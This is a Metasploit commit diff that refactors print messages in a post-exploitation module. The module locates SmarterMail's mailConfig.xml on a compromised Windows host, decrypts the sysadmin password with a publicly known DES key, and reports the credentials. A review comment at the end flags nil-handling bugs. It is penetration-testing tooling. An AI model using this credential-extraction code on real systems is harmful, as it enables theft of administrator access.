Modify prints

bug/bundler_fix
sinn3r 2014-02-02 21:58:10 -06:00
parent 62dca111f8
commit 2b2194cee8
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
1 changed files with 19 additions and 22 deletions


@ -1,15 +1,13 @@
# -*- coding: utf-8 -*-
## ##
# This module requires Metasploit: http//metasploit.com/download # This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'msf/core' require 'msf/core'
require 'msf/core/auxiliary/report' require 'msf/core/auxiliary/report'
require 'rex'
class Metasploit3 < Msf::Post class Metasploit3 < Msf::Post
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Post::File
def initialize(info = {}) def initialize(info = {})
super(update_info( super(update_info(
@ -19,12 +17,13 @@ class Metasploit3 < Msf::Post
This module extracts and decrypts the sysadmin password in the This module extracts and decrypts the sysadmin password in the
SmarterMail 'mailConfig.xml' configuration file. The encryption SmarterMail 'mailConfig.xml' configuration file. The encryption
key and IV are publicly known. key and IV are publicly known.
This module has been tested successfully on SmarterMail versions This module has been tested successfully on SmarterMail versions
10.7.4842 and 11.7.5136. 10.7.4842 and 11.7.5136.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Author' => [
'Joe Giron @theonlyevil1', # Discovery and PoC 'Joe Giron', # Discovery and PoC (@theonlyevil1)
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
], ],
'References' => 'References' =>
@ -36,6 +35,10 @@ class Metasploit3 < Msf::Post
)) ))
end end
def peer
"#{session.sock.peerhost} (#{sysinfo['Computer']})"
end
# #
# Decrypt DES encrypted password string # Decrypt DES encrypted password string
# #
@ -56,12 +59,10 @@ class Metasploit3 < Msf::Post
['Program Files (x86)', 'Program Files'].each do |program_dir| ['Program Files (x86)', 'Program Files'].each do |program_dir|
begin begin
path = "#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml" path = "#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml"
vprint_status "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + vprint_status "#{peer} - Checking for SmarterMail config file: #{path}"
"Checking for SmarterMail config file: #{path}"
return path if client.fs.file.stat(path) return path if client.fs.file.stat(path)
rescue Rex::Post::Meterpreter::RequestError => e rescue Rex::Post::Meterpreter::RequestError => e
print_error "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + print_error "#{peer} - Could not load #{path} - #{e}"
"Could not load #{path} - #{e}"
return return
end end
end end
@ -72,18 +73,15 @@ class Metasploit3 < Msf::Post
# #
def get_smartermail_creds(path) def get_smartermail_creds(path)
result = {} result = {}
vprint_status "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + vprint_status "#{peer} - Retrieving SmarterMail sysadmin password"
'Retrieving SmarterMail sysadmin password'
begin begin
data = read_file("#{path}") || '' data = read_file("#{path}") || ''
rescue Rex::Post::Meterpreter::RequestError => e rescue Rex::Post::Meterpreter::RequestError => e
print_error "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + print_error "#{peer} - Failed to download #{path} - #{e.to_s}"
"Failed to download #{path} - #{e}"
return return
end end
if data.nil? if data.nil?
print_error "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + print_error "#{peer} - Configuration file is empty."
'Configuration file is empty.'
return return
end end
username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/) username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/)
@ -100,27 +98,26 @@ class Metasploit3 < Msf::Post
# check for SmartMail config file # check for SmartMail config file
config_path = check_smartermail config_path = check_smartermail
if config_path.nil? if config_path.nil?
print_error "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + print_error "#{peer} - Could not find SmarterMail config file"
'Could not find SmarterMail config file'
return return
end end
# retrieve username and decrypted password from config file # retrieve username and decrypted password from config file
result = get_smartermail_creds(config_path) result = get_smartermail_creds(config_path)
if result['password'].nil? if result['password'].nil?
print_error "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + print_error "#{peer} - Could not decrypt password string"
'Could not decrypt password string'
return return
end end
# report result # report result
print_good "#{session.sock.peerhost} (#{sysinfo['Computer']}) - Found credentials. " + user = result['username']
"Username: '#{result['username']}' Password: '#{result['password']}'" pass = result['password']
print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'"
report_auth_info( report_auth_info(
:host => session.sock.peerhost, :host => session.sock.peerhost,
:sname => 'http', :sname => 'http',
:user => result['username'], :user => user,
:pass => result['password'], :pass => pass,
:source_id => session.db_record ? session.db_record.id : nil, :source_id => session.db_record ? session.db_record.id : nil,
:source_type => 'vuln') :source_type => 'vuln')
end end
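Review bot: In `run`, `result['password'].nil?` is still called directly on the return value of `get_smartermail_creds`, whose failure paths in the previous hunk exit with a bare `return`. A failed `read_file` therefore yields nil and the check raises NoMethodError instead of reaching the reworded "Could not decrypt password string" message. Guarding with `if result.nil? || result['password'].nil?` keeps that error path clean. In the same previous hunk, `data.nil?` can never be true because of the `|| ''` on the `read_file` line, so the "Configuration file is empty." message is unreachable; `if data.empty?` matches the intent. Both methods continue outside the hunks shown, so the normal return value of `get_smartermail_creds` should be confirmed against the full file.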